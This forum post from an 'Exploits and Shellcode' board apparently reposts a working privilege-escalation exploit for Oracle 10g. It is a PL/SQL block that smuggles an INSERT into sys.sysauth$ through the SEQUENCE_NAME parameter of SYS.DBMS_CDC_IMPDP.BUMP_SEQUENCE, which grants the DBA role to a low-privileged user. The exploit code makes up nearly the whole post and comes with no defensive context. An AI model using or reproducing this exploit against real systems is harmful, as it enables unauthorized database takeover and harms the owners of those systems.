Oracle 10g SYS.DBMS_CDC_IMPDP.BUMP_SEQUENCE PL/SQL Injection

pub!1c

魔

团队执行官

Rank: 8 Rank: 8

E.S.T核心成员

帖子: 3926
精华: 128
积分: 209876
阅读权限: 200
性别: 男
在线时间: 1117 小时
注册时间: 2007-10-23
最后登录: 2008-11-17

资料收集奖运营支持奖

发短消息
加为好友
当前离线

楼主大中小发表于 2007-1-25 22:10 只看该作者

Oracle 10g SYS.DBMS_CDC_IMPDP.BUMP_SEQUENCE PL/SQL Injection

复制内容到剪贴板

代码:

/**

* Exploit for Oracle10g R1 and R2 prior to CPU Oct 2006

* Joxean Koret <[email]joxeankoret@yahoo.es[/email]>

* Privileges needed:

*

* - CREATE SESSION

*

* Max. Length 97. Very, very cool

*

*/

select *

from user_role_privs

;



DECLARE

SEQUENCE_OWNER VARCHAR2(200);

SEQUENCE_NAME VARCHAR2(200);

v_user_id number;

v_commands VARCHAR2(32767);

NEW_VALUE NUMBER;

BEGIN

SELECT user_id INTO v_user_id

FROM user_users;



v_commands := &#39;insert into sys.sysauth$ &#39; ||

&#39; values&#39; ||

&#39;(&#39; || v_user_id || &#39;,4,&#39; ||

&#39;999,null)&#39;;



SEQUENCE_OWNER := &#39;TEST&#39;;

SEQUENCE_NAME := &#39;&#39;&#39;,lockhandle=>:1);&#39; || v_commands || &#39;;commit;

end;--&#39;;

NEW_VALUE := 1;

SYS.DBMS_CDC_IMPDP.BUMP_SEQUENCE(

SEQUENCE_OWNER => SEQUENCE_OWNER,

SEQUENCE_NAME => SEQUENCE_NAME,

NEW_VALUE => NEW_VALUE

);

END;

/



select *

from user_role_privs

;

TOP

‹‹ 上一主题 | 下一主题 ››

邪恶八进制信息安全团队技术讨论组 » 安全测试代码{ Exploits and Shellcode } » Oracle 10g SYS.DBMS_CDC_IMPDP.BUMP_SEQUENCE PL/SQL Injection